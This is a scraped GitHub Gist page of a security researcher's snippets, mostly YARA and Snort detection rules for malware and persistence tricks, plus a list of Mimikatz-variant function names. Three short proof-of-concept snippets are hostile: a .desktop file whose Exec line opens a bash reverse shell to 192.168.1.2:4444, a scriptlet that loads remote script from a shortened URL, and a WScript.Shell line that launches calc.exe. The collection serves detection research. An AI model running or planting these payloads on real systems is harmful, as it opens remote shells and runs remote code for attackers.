Skip to content

Instantly share code, notes, and snippets.

Nick Carr itsreallynick

Block or report user

Report or block itsreallynick

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@itsreallynick
itsreallynick / installutilpayload.yar
Last active Nov 19, 2019
Making this rule public
View installutilpayload.yar
rule Hunting_InstallUtil_ProbablePayload
{
meta:
author = "Nick Carr - @itsreallynick"
description = "2019-05-22 - Focusing on the underlying structure that largely cannot change outside of obfuscation"
strings:
$installutil = "System.Configuration.Install" nocase ascii wide
$override_func1 = "public override string HelpText" nocase ascii wide
$override_func2 = "public override void Uninstall" nocase ascii wide
$override_func3 = "public override void Install" nocase ascii wide
View poc.desktop
[Desktop Entry]
Name=GoShortcutItsYourEpoch
Exec=/bin/bash -i >& /dev/tcp/192.168.1.2/4444 0>&1
Icon=http://bit.ly/icon-png
Terminal=false
Type=Application
@itsreallynick
itsreallynick / dailyworkflow.yar
Created Oct 24, 2019
Workflow.Compiler rules from August 2018
View dailyworkflow.yar
// Background:
rule Hunting_Workflow_Collection_XOML {
meta:
author = "Nick Carr - @itsreallynick"
strings:
$workflow1 = "<SequentialWorkflowActivity" nocase ascii wide
$workflow2 = "Code" nocase ascii wide
condition:
uint16(0) != 0x5A4D and all of ($workflow*) and new_file
@itsreallynick
itsreallynick / gen_URLpersistence.yar
Last active Oct 17, 2019
Yara rules for .url tricks that didn't fit in a tweet
View gen_URLpersistence.yar
rule Methodology_Suspicious_Shortcut_Local_URL
{
meta:
author = "@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)"
description = "Detects local script usage for .URL persistence"
reference = "https://twitter.com/cglyer/status/1176184798248919044"
strings:
$file = "URL=file:///" nocase
$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
$url_explicit = "[InternetShortcut]" nocase
View mimistack
143 function Invoke-Mimidogz
140 function Invoke-Mimikatz
29 function Invoke-Mimi
10 function Chokorun
7 function Invoke-Ttest
7 function Invoke-Mimiwormz
7 function Invoke-Me
6 function Invoke-Mimiturtle
6 function Invoke-Mimimi
5 function output
View keybase.md

Keybase proof

I hereby claim:

  • I am itsreallynick on github.
  • I am itsreallynick (https://keybase.io/itsreallynick) on keybase.
  • I have a public key ASDBI4S7vhTSnA-yeUaMckHjZTAVTcOo8qpkRA1h9UCz_wo

To claim this, I am signing this object:

View calc.lol
<component><script src="http://goo.gl/fxtJVt"></script></component>
View itsreallycalc
var itsreallycalc = new ActiveXObject("WScript.Shell").Run("calc.exe");
@itsreallynick
itsreallynick / help_Elm0d.yara
Last active Aug 30, 2017
Elm0d the Researcher
View help_Elm0d.yara
rule help_Elm0d
{
meta:
author = "@ItsReallyNick - Nick Carr"
description = "We are STILL helping https://twitter.com/Elm0D find his files"
reference = "https://twitter.com/ItsReallyNick/status/902702954272223232"
strings:
$elm0d = /[^a-z0-9]elm0d[^a-z0-9]/ nocase ascii wide
$lol_infra = "iso9001-certificare.ro" nocase ascii wide
$lol_website = "www.elm0d.tk" nocase ascii wide
@itsreallynick
itsreallynick / confession.rules
Created Apr 7, 2017
They made me find you. They made me
View confession.rules
# Detecting client or server guilt
alert icmp any any -> any any (msg:"Suspected Terrifying Confession"; content:"They made me"; pcre:"/(They made me (do|bop|twist|pull) it\.){60,}/i"; reference:url,https://twitter.com/ItsReallyNick/status/849641156153442305; sid:646965; rev:1;)
You can’t perform that action at this time.